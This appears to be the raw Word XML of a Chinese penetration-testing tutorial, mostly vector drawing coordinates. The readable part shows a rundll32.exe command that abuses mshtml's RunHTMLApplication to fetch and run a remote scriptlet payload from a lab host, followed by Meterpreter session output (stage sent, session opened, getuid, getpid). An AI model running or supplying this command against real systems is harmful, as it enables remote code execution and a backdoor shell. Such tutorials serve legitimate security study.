,13699,3536,13700,3536,13701,3536,13702,3536,13703,3536,13705,3536,13706,3536,13707,3536,13709,3536,13710,3536,13712,3536,13714,3536,13715,3536,13717,3536,13719,3536,13721,3536,13722,3536,13724,3536,13726,3536,13728,3536,13731,3536,13733,3536,13735,3536,13737,3536,13740,3536,13742,3536,13745,3536,13747,3536,13750,3536,13753,3536,13756,3536,13758,3536,13761,3536,13764,3536,13767,3536,13771,3536,13774,3536,13777,3536,13781,3536,13784,3536,13788,3536,13791,3536,13795,3536,13799,3536,13803,3536,13807,3536,13811,3536,13815,3536,13819,3536,13823,3536,13828,3536,13832,3536,13837,3536,13842,3536,13846,3536,13851,3536,13856,3536,13861,3536,13866,3536,13872,3536,13877,3536,13882,3536,13888,3536,13894,3536,13899,3536,13905,3536,13911,3536,13917,3536,13923,3536,13930,3536,13936,3536,13936,3536,13936,3536,13936,3536,13936,3536,13936,3536,13936,3536,13936,3536,13936,3536,13936,3536,13936,3536,13936,3536,13936,3536,13936,3536,13936,3536,13936,3536,13936,3535,13936,3535,13936,3535,13936,3535,13936,3535,13936,3535,13936,3535,13936,3535,13936,3535,13936,3535,13936,3535,13936,3534,13936,3534,13936,3534,13936,3534,13936,3534,13936,3533,13936,3533,13936,3533,13936,3533,13936,3532,13936,3532,13936,3532,13936,3532,13936,3531,13936,3531,13936,3531,13936,3530,13936,3530,13936,3529,13936,3529,13936,3528,13936,3528,13936,3527,13936,3527,13936,3526,13936,3526,13936,3525,13936,3525,13936,3524,13936,3523,13936,3523,13936,3522,13936,3521,13936,3520,13936,3520,13936,3519,13936,3518,13936,3517,13936,3516,13936,3515,13936,3514,13936,3513,13936,3512,13936,3511,13936,3510,13936,3509,13936,3508,13936,3507,13936,3506,13936,3505,13936,3503,13936,3502,13936,3501,13936,3499,13936,3498,13936,3496,13936,3495,13936,3494,13936,3492,13936,3490,13936,3489,13936,3487,13936,3486,13936,3484,13936,3482,13936,3480,13936,3478,13936,3477,13936,3475,13936,3473,13936,3471,13936,3469,13936,3467,13936,3465,13936,3462,13936,3460,13936,3458,13936,3456,13936,3453,13936,3451,13936,3449,13936,3446,13936,3444,13936,3441,13936,3438,13936,3436,13936,3433,13936,3430,13936,3427,13936,3425,13936,3422,13936,3419,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13936,3416,13935,3416,13935,3416,13935,3416,13935,3416,13935,3416,13935,3416,13934,3416,13934,3416,13934,3416,13934,3416,13933,3416,13933,3416,13933,3416,13932,3416,13932,3416,13932,3416,13931,3416,13931,3416,13930,3416,13930,3416,13929,3416,13928,3416,13928,3416,13927,3416,13926,3416,13926,3416,13925,3416,13924,3416,13923,3416,13922,3416,13921,3416,13920,3416,13919,3416,13918,3416,13917,3416,13916,3416,13915,3416,13913,3416,13912,3416,13911,3416,13909,3416,13908,3416,13906,3416,13905,3416,13903,3416,13902,3416,13900,3416,13898,3416,13896,3416,13894,3416,13892,3416,13890,3416,13888,3416,13886,3416,13884,3416,13882,3416,13880,3416,13877,3416,13875,3416,13872,3416,13870,3416,13867,3416,13864,3416,13861,3416,13859,3416,13856,3416,13853,3416,13849,3416,13846,3416,13843,3416,13840,3416,13836,3416,13833,3416,13829,3416,13826,3416,13822,3416,13818,3416,13814,3416,13810,3416,13806,3416,13802,3416,13798,3416,13794,3416,13789,3416,13785,3416,13780,3416,13775,3416,13771,3416,13766,3416,13761,3416,13756,3416,13751,3416,13745,3416,13740,3416,13735,3416,13729,3416,13723,3416,13718,3416,13712,3416,13706,3416,13700,3416,13694,3416,13687,3416,13681e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:173.874pt;margin-top:718.874pt;width:7.125pt;height:14.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3477,14377" coordsize="142,282">
        <v:shape style="position:absolute;left:3477;top:14377;width:142;height:282" coordorigin="3477,14377" coordsize="142,282" path="m3506,14416l3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3506,14416,3507,14416,3507,14416,3507,14416,3507,14416,3507,14416,3507,14416,3507,14416,3508,14416,3508,14416,3508,14416,3508,14416,3508,14416,3509,14416,3509,14416,3509,14416,3509,14416,3510,14416,3510,14416,3510,14416,3511,14416,3511,14416,3511,14416,3512,14416,3512,14416,3513,14416,3513,14416,3514,14416,3514,14416,3515,14416,3515,14416,3516,14416,3516,14416,3517,14416,3518,14416,3518,14416,3519,14416,3520,14416,3520,14416,3521,14416,3522,14416,3523,14416,3524,14416,3524,14416,3525,14416,3526,14416,3527,14416,3528,14416,3529,14416,3530,14416,3531,14416,3532,14416,3533,14416,3535,14416,3536,14416,3537,14416,3538,14416,3540,14416,3541,14416,3542,14416,3544,14416,3545,14416,3547,14416,3548,14416,3550,14416,3551,14416,3553,14416,3554,14416,3556,14416,3558,14416,3559,14416,3561,14416,3563,14416,3565,14416,3567,14416,3569,14416,3571,14416,3573,14416,3575,14416,3577,14416,3579,14416,3581,14416,3584,14416,3586,14416,3588,14416,3591,14416,3593,14416,3596,14416,3598,14416,3601,14416,3603,14416,3606,14416,3609,14416,3611,14416,3614,14416,3617,14416,3620,14416,3623,14416,3626,14416,3626,14416,3626,14416,3626,14416,3626,14416,3626,14416,3626,14416,3626,14416,3626,14416,3626,14416,3626,14416,3626,14416,3626,14416,3626,14417,3626,14417,3626,14417,3626,14417,3626,14417,3626,14417,3626,14417,3626,14417,3626,14417,3626,14418,3626,14418,3626,14418,3626,14418,3626,14419,3626,14419,3626,14419,3626,14420,3626,14420,3626,14420,3626,14421,3626,14421,3626,14422,3626,14422,3626,14423,3626,14423,3626,14424,3626,14425,3626,14425,3626,14426,3626,14427,3626,14427,3626,14428,3626,14429,3626,14430,3626,14431,3626,14432,3626,14433,3626,14434,3626,14435,3626,14436,3626,14438,3626,14439,3626,14440,3626,14441,3626,14443,3626,14444,3626,14446,3626,14447,3626,14449,3626,14451,3626,14452,3626,14454,3626,14456,3626,14458,3626,14460,3626,14462,3626,14464,3626,14466,3626,14468,3626,14470,3626,14473,3626,14475,3626,14478,3626,14480,3626,14483,3626,14485,3626,14488,3626,14491,3626,14494,3626,14497,3626,14500,3626,14503,3626,14506,3626,14509,3626,14513,3626,14516,3626,14519,3626,14523,3626,14527,3626,14530,3626,14534,3626,14538,3626,14542,3626,14546,3626,14550,3626,14554,3626,14559,3626,14563,3626,14568,3626,14572,3626,14577,3626,14582,3626,14587,3626,14592,3626,14597,3626,14602,3626,14607,3626,14612,3626,14618,3626,14623,3626,14629,3626,14635,3626,14641,3626,14647,3626,14653,3626,14659,3626,14665,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3626,14671,3625,14671,3625,14671,3625,14671,3625,14671,3625,14671,3625,14671,3625,14671,3625,14671,3625,14671,3625,14671,3624,14671,3624,14671,3624,14671,3624,14671,3624,14671,3623,14671,3623,14671,3623,14671,3623,14671,3623,14671,3622,14671,3622,14671,3622,14671,3621,14671,3621,14671,3621,14671,3620,14671,3620,14671,3619,14671,3619,14671,3618,14671,3618,14671,3617,14671,3617,14671,3616,14671,3616,14671,3615,14671,3615,14671,3614,14671,3613,14671,3613,14671,3612,14671,3611,14671,3610,14671,3610,14671,3609,14671,3608,14671,3607,14671,3606,14671,3605,14671,3604,14671,3603,14671,3602,14671,3601,14671,3600,14671,3599,14671,3598,14671,3597,14671,3596,14671,3595,14671,3593,14671,3592,14671,3591,14671,3589,14671,3588,14671,3587,14671,3585,14671,3584,14671,3582,14671,3581,14671,3579,14671,3577,14671,3576,14671,3574,14671,3572,14671,3570,14671,3569,14671,3567,14671,3565,14671,3563,14671,3561,14671,3559,14671,3557,14671,3555,14671,3552,14671,3550,14671,3548,14671,3546,14671,3543,14671,3541,14671,3539,14671,3536,14671,3534,14671,3531,14671,3528,14671,3526,14671,3523,14671,3520,14671,3517,14671,3515,14671,3512,14671,3509,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14671,3506,14670,3506,14670,3506,14670,3506,14670,3506,14670,3506,14669,3506,14669,3506,14669,3506,14668,3506,14668,3506,14668,3506,14667,3506,14667,3506,14666,3506,14666,3506,14665,3506,14665,3506,14664,3506,14664,3506,14663,3506,14662,3506,14662,3506,14661,3506,14660,3506,14659,3506,14658,3506,14658,3506,14657,3506,14656,3506,14655,3506,14654,3506,14652,3506,14651,3506,14650,3506,14649,3506,14648,3506,14646,3506,14645,3506,14643,3506,14642,3506,14640,3506,14639,3506,14637,3506,14635,3506,14634,3506,14632,3506,14630,3506,14628,3506,14626,3506,14624,3506,14622,3506,14619,3506,14617,3506,14615,3506,14612,3506,14610,3506,14608,3506,14605,3506,14602,3506,14600,3506,14597,3506,14594,3506,14591,3506,14588,3506,14585,3506,14582,3506,14578,3506,14575,3506,14572,3506,14568,3506,14565,3506,14561,3506,14557,3506,14554,3506,14550,3506,14546,3506,14542,3506,14537,3506,14533,3506,14529,3506,14524,3506,14520,3506,14515,3506,14511,3506,14506,3506,14501,3506,14496,3506,14491,3506,14486,3506,14481,3506,14475,3506,14470,3506,14464,3506,14459,3506,14453,3506,14447,3506,14441,3506,14435,3506,14429,3506,14423,3506,1441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295" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="2191" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\Windows\SysWOW64\rundll32.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-56"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>javascript:"\..\mshtml,RunHTMLApplication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000000"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>";document.write();GetObject("script:h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ttp://192.168.1.4/Rundll32_shellcode")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="248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2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：x64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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rundll32.exe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1" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="551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Sending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stage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179779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bytes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.5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3590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session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57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opened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41274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04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13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26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0500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="13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6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getuid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username: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PC\John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getpid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pid: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7064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818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9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74.500pt;margin-top:295.500pt;width:449.500pt;height:34.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,5910" coordsize="8990,690">
        <v:shape style="position:absolute;left:1490;top:5910;width:8990;height:690" coordorigin="1490,5910" coordsize="8990,690" path="m1510,5937l1510,5937,1510,5937,1510,5937,1510,5937,1510,5937,1510,5937,1511,5937,1512,5937,1512,5937,1514,5937,1515,5937,1517,5937,1519,5937,1521,5937,1524,5937,1528,5937,1532,5937,1536,5937,1541,5937,1546,5937,1552,5937,1559,5937,1566,5937,1575,5937,1583,5937,1593,5937,1603,5937,1615,5937,1627,5937,1640,5937,1654,5937,1668,5937,1684,5937,1701,5937,1719,5937,1738,5937,1758,5937,1780,5937,1802,5937,1826,5937,1851,5937,1877,5937,1904,5937,1933,5937,1963,5937,1995,5937,2028,5937,2063,5937,2099,5937,2136,5937,2175,5937,2216,5937,2259,5937,2303,5937,2348,5937,2396,5937,2445,5937,2496,5937,2549,5937,2604,5937,2660,5937,2719,5937,2779,5937,2841,5937,2906,5937,2972,5937,3041,5937,3112,5937,3184,5937,3259,5937,3336,5937,3416,5937,3498,5937,3582,5937,3668,5937,3757,5937,3848,5937,3941,5937,4037,5937,4136,5937,4236,5937,4340,5937,4446,5937,4555,5937,4666,5937,4780,5937,4897,5937,5017,5937,5139,5937,5264,5937,5392,5937,5523,5937,5657,5937,5793,5937,5933,5937,6076,5937,6222,5937,6370,5937,6522,5937,6677,5937,6835,5937,6997,5937,7161,5937,7329,5937,7500,5937,7675,5937,7853,5937,8034,5937,8219,5937,8407,5937,8598,5937,8793,5937,8992,5937,9194,5937,9400,5937,9609,5937,9823,5937,10039,5937,10260,5937,10484,5937,10484,5937,10484,5937,10484,5937,10484,5937,10484,5937,10484,5937,10484,5937,10484,5937,10484,5937,10484,5937,10484,5937,10484,5938,10484,5938,10484,5938,10484,5938,10484,5938,10484,5939,10484,5939,10484,5939,10484,5940,10484,5940,10484,5941,10484,5941,10484,5942,10484,5943,10484,5943,10484,5944,10484,5945,10484,5946,10484,5947,10484,5948,10484,5949,10484,5950,10484,5951,10484,5953,10484,5954,10484,5956,10484,5957,10484,5959,10484,5961,10484,5963,10484,5965,10484,5967,10484,5969,10484,5971,10484,5974,10484,5976,10484,5979,10484,5981,10484,5984,10484,5987,10484,5990,10484,5993,10484,5997,10484,6000,10484,6004,10484,6007,10484,6011,10484,6015,10484,6019,10484,6024,10484,6028,10484,6033,10484,6037,10484,6042,10484,6047,10484,6052,10484,6058,10484,6063,10484,6069,10484,6074,10484,6080,10484,6087,10484,6093,10484,6099,10484,6106,10484,6113,10484,6120,10484,6127,10484,6135,10484,6142,10484,6150,10484,6158,10484,6166,10484,6175,10484,6183,10484,6192,10484,6201,10484,6210,10484,6220,10484,6229,10484,6239,10484,6249,10484,6259,10484,6270,10484,6281,10484,6292,10484,6303,10484,6314,10484,6326,10484,6338,10484,6350,10484,6362,10484,6375,10484,6388,10484,6401,10484,6414,10484,6428,10484,6442,10484,6456,10484,6470,10484,6485,10484,6500,10484,6515,10484,6531,10484,6546,10484,6563,10484,6579,10484,6595,10484,6612,10484,6612,10484,6612,10484,6612,10484,6612,10484,6612,10484,6612,10483,6612,10482,6612,10482,6612,10480,6612,10479,6612,10477,6612,10475,6612,10473,6612,10470,6612,10466,6612,10462,6612,10458,6612,10453,6612,10448,6612,10442,6612,10435,6612,10428,6612,10419,6612,10411,6612,10401,6612,10391,6612,10379,6612,10367,6612,10354,6612,10340,6612,10326,6612,10310,6612,10293,6612,10275,6612,10256,6612,10236,6612,10215,6612,10192,6612,10168,6612,10143,6612,10117,6612,10090,6612,10061,6612,10031,6612,9999,6612,9966,6612,9931,6612,9895,6612,9858,6612,9819,6612,9778,6612,9735,6612,9691,6612,9646,6612,9598,6612,9549,6612,9498,6612,9445,6612,9391,6612,9334,6612,9275,6612,9215,6612,9153,6612,9088,6612,9022,6612,8953,6612,8883,6612,8810,6612,8735,6612,8658,6612,8578,6612,8497,6612,8413,6612,8326,6612,8238,6612,8146,6612,8053,6612,7957,6612,7859,6612,7758,6612,7654,6612,7548,6612,7439,6612,7328,6612,7214,6612,7097,6612,6977,6612,6855,6612,6730,6612,6602,6612,6471,6612,6337,6612,6201,6612,6061,6612,5918,6612,5773,6612,5624,6612,5472,6612,5317,6612,5159,6612,4997,6612,4833,6612,4665,6612,4494,6612,4319,6612,4141,6612,3960,6612,3776,6612,3587,6612,3396,6612,3201,6612,3002,6612,2800,6612,2594,6612,2385,6612,2172,6612,1955,6612,1734,6612,1510,6612,1510,6612,1510,6612,1510,6612,1510,6612,1510,6612,1510,6612,1510,6612,1510,6612,1510,6612,1510,6612,1510,6612,1510,6612,1510,6612,1510,6611,1510,6611,1510,6611,1510,6611,1510,6610,1510,6610,1510,6610,1510,6609,1510,6609,1510,6608,1510,6607,1510,6607,1510,6606,1510,6605,1510,6604,1510,6604,1510,6603,1510,6602,1510,6600,1510,6599,1510,6598,1510,6597,1510,6595,1510,6594,1510,6592,1510,6590,1510,6589,1510,6587,1510,6585,1510,6583,1510,6580,1510,6578,1510,6576,1510,6573,1510,6571,1510,6568,1510,6565,1510,6562,1510,6559,1510,6556,1510,6553,1510,6549,1510,6546,1510,6542,1510,6538,1510,6534,1510,6530,1510,6526,1510,6521,1510,6517,1510,6512,1510,6507,1510,6502,1510,6497,1510,6492,1510,6486,1510,6481,1510,6475,1510,6469,1510,6463,1510,6456,1510,6450,1510,6443,1510,6436,1510,6429,1510,6422,1510,6415,1510,6407,1510,6399,1510,6391,1510,6383,1510,6375,1510,6366,1510,6357,1510,6348,1510,6339,1510,6330,1510,6320,1510,6310,1510,6300,1510,6290,1510,6279,1510,6269,1510,6258,1510,6247,1510,6235,1510,6223,1510,6212,1510,6199,1510,6187,1510,6174,1510,6162,1510,6148,1510,6135,1510,6121,1510,6107,1510,6093,1510,6079,1510,6064,1510,6049,1510,6034,1510,6019,1510,6003,1510,5987,1510,5970,1510,5954,1510,5937e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:295.800pt;width:445.800pt;height:35.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:519.500pt;margin-top:497.500pt;width:0.500pt;height:212.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,9950" coordsize="10,4250">
        <v:shape style="position:absolute;left:10390;top:9950;width:10;height:4250" coordorigin="10390,9950" coordsize="10,4250" path="m10402,9959l10402,9959,10402,9959,10402,9959,10402,9959,10402,9959,10402,9959,10402,9960,10402,9960,10402,9960,10402,9961,10402,9962,10402,9962,10402,9963,10402,9965,10402,9966,10402,9968,10402,9969,10402,9971,10402,9974,10402,9976,10402,9979,10402,9982,10402,9986,10402,9990,10402,9994,10402,9998,10402,10003,10402,10009,10402,10014,10402,10020,10402,10027,10402,10034,10402,10042,10402,10050,10402,10058,10402,10067,10402,10077,10402,10087,10402,10097,10402,10109,10402,10120,10402,10133,10402,10146,10402,10159,10402,10174,10402,10189,10402,10204,10402,10221,10402,10238,10402,10256,10402,10274,10402,10293,10402,10313,10402,10334,10402,10356,10402,10378,10402,10402,10402,10426,10402,10451,10402,10477,10402,10503,10402,10531,10402,10560,10402,10589,10402,10620,10402,10651,10402,10684,10402,10717,10402,10751,10402,10787,10402,10823,10402,10861,10402,10900,10402,10939,10402,10980,10402,11022,10402,11065,10402,11110,10402,11155,10402,11202,10402,11249,10402,11298,10402,11349,10402,11400,10402,11453,10402,11507,10402,11562,10402,11619,10402,11677,10402,11736,10402,11796,10402,11858,10402,11922,10402,11986,10402,12052,10402,12120,10402,12189,10402,12259,10402,12331,10402,12404,10402,12479,10402,12556,10402,12634,10402,12713,10402,12794,10402,12877,10402,12961,10402,13047,10402,13134,10402,13223,10402,13314,10402,13406,10402,13500,10402,13596,10402,13693,10402,13792,10402,13893,10402,13996,10402,14100,10402,14206e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:496.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,9930" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:9930;width:8990;height:390" coordorigin="1490,9930" coordsize="8990,390" path="m1510,9959l1510,9959,1510,9959,1510,9959,1510,9959,1510,9959,1510,9959,1511,9959,1512,9959,1512,9959,1514,9959,1515,9959,1517,9959,1519,9959,1521,9959,1524,9959,1528,9959,1532,9959,1536,9959,1541,9959,1546,9959,1552,9959,1559,9959,1566,9959,1575,9959,1583,9959,1593,9959,1603,9959,1615,9959,1627,9959,1640,9959,1654,9959,1668,9959,1684,9959,1701,9959,1719,9959,1738,9959,1758,9959,1780,9959,1802,9959,1826,9959,1851,9959,1877,9959,1904,9959,1933,9959,1963,9959,1995,9959,2028,9959,2063,9959,2099,9959,2136,9959,2175,9959,2216,9959,2259,9959,2303,9959,2348,9959,2396,9959,2445,9959,2496,9959,2549,9959,2604,9959,2660,9959,2719,9959,2779,9959,2841,9959,2906,9959,2972,9959,3041,9959,3112,9959,3184,9959,3259,9959,3336,9959,3416,9959,3498,9959,3582,9959,3668,9959,3757,9959,3848,9959,3941,9959,4037,9959,4136,9959,4236,9959,4340,9959,4446,9959,4555,9959,4666,9959,4780,9959,4897,9959,5017,9959,5139,9959,5264,9959,5392,9959,5523,9959,5657,9959,5793,9959,5933,9959,6076,9959,6222,9959,6370,9959,6522,9959,6677,9959,6835,9959,6997,9959,7161,9959,7329,9959,7500,9959,7675,9959,7853,9959,8034,9959,8219,9959,8407,9959,8598,9959,8793,9959,8992,9959,9194,9959,9400,9959,9609,9959,9823,9959,10039,9959,10260,9959,10484,9959,10484,9959,10484,9959,10484,9959,10484,9959,10484,9959,10484,9959,10484,9959,10484,9959,10484,9959,10484,9959,10484,9959,10484,9959,10484,9959,10484,9960,10484,9960,10484,9960,10484,9960,10484,9960,10484,9960,10484,9961,10484,9961,10484,9961,10484,9961,10484,9962,10484,9962,10484,9962,10484,9963,10484,9963,10484,9964,10484,9964,10484,9965,10484,9966,10484,9966,10484,9967,10484,9968,10484,9969,10484,9969,10484,9970,10484,9971,10484,9972,10484,9973,10484,9974,10484,9976,10484,9977,10484,9978,10484,9979,10484,9981,10484,9982,10484,9984,10484,9985,10484,9987,10484,9989,10484,9990,10484,9992,10484,9994,10484,9996,10484,9998,10484,10000,10484,10002,10484,10005,10484,10007,10484,10010,10484,10012,10484,10015,10484,10017,10484,10020,10484,10023,10484,10026,10484,10029,10484,10032,10484,10035,10484,10039,10484,10042,10484,10046,10484,10049,10484,10053,10484,10057,10484,10061,10484,10065,10484,10069,10484,10073,10484,10077,10484,10082,10484,10086,10484,10091,10484,10096,10484,10101,10484,10106,10484,10111,10484,10116,10484,10121,10484,10127,10484,10132,10484,10138,10484,10144,10484,10150,10484,10156,10484,10162,10484,10169,10484,10175,10484,10182,10484,10188,10484,10195,10484,10202,10484,10209,10484,10217,10484,10224,10484,10232,10484,10239,10484,10247,10484,10255,10484,10264,10484,10272,10484,10280,10484,10289,10484,10298,10484,10307,10484,10316,10484,10325,10484,10334,10484,10334,10484,10334,10484,10334,10484,10334,10484,10334,10484,10334,10483,10334,10482,10334,10482,10334,10480,10334,10479,10334,10477,10334,10475,10334,10473,10334,10470,10334,10466,10334,10462,10334,10458,10334,10453,10334,10448,10334,10442,10334,10435,10334,10428,10334,10419,10334,10411,10334,10401,10334,10391,10334,10379,10334,10367,10334,10354,10334,10340,10334,10326,10334,10310,10334,10293,10334,10275,10334,10256,10334,10236,10334,10215,10334,10192,10334,10168,10334,10143,10334,10117,10334,10090,10334,10061,10334,10031,10334,9999,10334,9966,10334,9931,10334,9895,10334,9858,10334,9819,10334,9778,10334,9735,10334,9691,10334,9646,10334,9598,10334,9549,10334,9498,10334,9445,10334,9391,10334,9334,10334,9275,10334,9215,10334,9153,10334,9088,10334,9022,10334,8953,10334,8883,10334,8810,10334,8735,10334,8658,10334,8578,10334,8497,10334,8413,10334,8326,10334,8238,10334,8146,10334,8053,10334,7957,10334,7859,10334,7758,10334,7654,10334,7548,10334,7439,10334,7328,10334,7214,10334,7097,10334,6977,10334,6855,10334,6730,10334,6602,10334,6471,10334,6337,10334,6201,10334,6061,10334,5918,10334,5773,10334,5624,10334,5472,10334,5317,10334,5159,10334,4997,10334,4833,10334,4665,10334,4494,10334,4319,10334,4141,10334,3960,10334,3776,10334,3587,10334,3396,10334,3201,10334,3002,10334,2800,10334,2594,10334,2385,10334,2172,10334,1955,10334,1734,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10333,1510,10333,1510,10333,1510,10333,1510,10333,1510,10332,1510,10332,1510,10332,1510,10331,1510,10331,1510,10331,1510,10330,1510,10330,1510,10329,1510,10329,1510,10328,1510,10328,1510,10327,1510,10326,1510,10325,1510,10325,1510,10324,1510,10323,1510,10322,1510,10321,1510,10320,1510,10319,1510,10318,1510,10317,1510,10315,1510,10314,1510,10313,1510,10311,1510,10310,1510,10308,1510,10306,1510,10305,1510,10303,1510,10301,1510,10299,1510,10297,1510,10295,1510,10293,1510,10291,1510,10288,1510,10286,1510,10284,1510,10281,1510,10279,1510,10276,1510,10273,1510,10270,1510,10267,1510,10264,1510,10261,1510,10258,1510,10255,1510,10251,1510,10248,1510,10244,1510,10240,1510,10236,1510,10233,1510,10229,1510,10224,1510,10220,1510,10216,1510,10211,1510,10207,1510,10202,1510,10197,1510,10193,1510,10188,1510,10182,1510,10177,1510,10172,1510,10166,1510,10161,1510,10155,1510,10149,1510,10143,1510,10137,1510,10131,1510,10125,1510,10118,1510,10112,1510,10105,1510,10098,1510,10091,1510,10084,1510,10076,1510,10069,1510,10061,1510,10054,1510,10046,1510,10038,1510,10030,1510,10021,1510,10013,1510,10004,1510,9996,1510,9987,1510,9978,1510,9968,1510,9959e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:496.800pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:515.500pt;width:449.500pt;height:17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,10310" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:10310;width:8990;height:350" coordorigin="1490,10310" coordsize="8990,350" path="m1510,10334l1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1510,10334,1511,10334,1512,10334,1512,10334,1514,10334,1515,10334,1517,10334,1519,10334,1521,10334,1524,10334,1528,10334,1532,10334,1536,10334,1541,10334,1546,10334,1552,10334,1559,10334,1566,10334,1575,10334,1583,10334,1593,10334,1603,10334,1615,10334,1627,10334,1640,10334,1654,10334,1668,10334,1684,10334,1701,10334,1719,10334,1738,10334,1758,10334,1780,10334,1802,10334,1826,10334,1851,10334,1877,10334,1904,10334,1933,10334,1963,10334,1995,10334,2028,10334,2063,10334,2099,10334,2136,10334,2175,10334,2216,10334,2259,10334,2303,10334,2348,10334,2396,10334,2445,10334,2496,10334,2549,10334,2604,10334,2660,10334,2719,10334,2779,10334,2841,10334,2906,10334,2972,10334,3041,10334,3112,10334,3184,10334,3259,10334,3336,10334,3416,10334,3498,10334,3582,10334,3668,10334,3757,10334,3848,10334,3941,10334,4037,10334,4136,10334,4236,10334,4340,10334,4446,10334,4555,10334,4666,10334,4780,10334,4897,10334,5017,10334,5139,10334,5264,10334,5392,10334,5523,10334,5657,10334,5793,10334,5933,10334,6076,10334,6222,10334,6370,10334,6522,10334,6677,10334,6835,10334,6997,10334,7161,10334,7329,10334,7500,10334,7675,10334,7853,10334,8034,10334,8219,10334,8407,10334,8598,10334,8793,10334,8992,10334,9194,10334,9400,10334,9609,10334,9823,10334,10039,10334,10260,10334,10484,10334,10484,10334,10484,10334,10484,10334,10484,10334,10484,10334,10484,10334,10484,10334,10484,10334,10484,10334,10484,10334,10484,10334,10484,10334,10484,10335,10484,10335,10484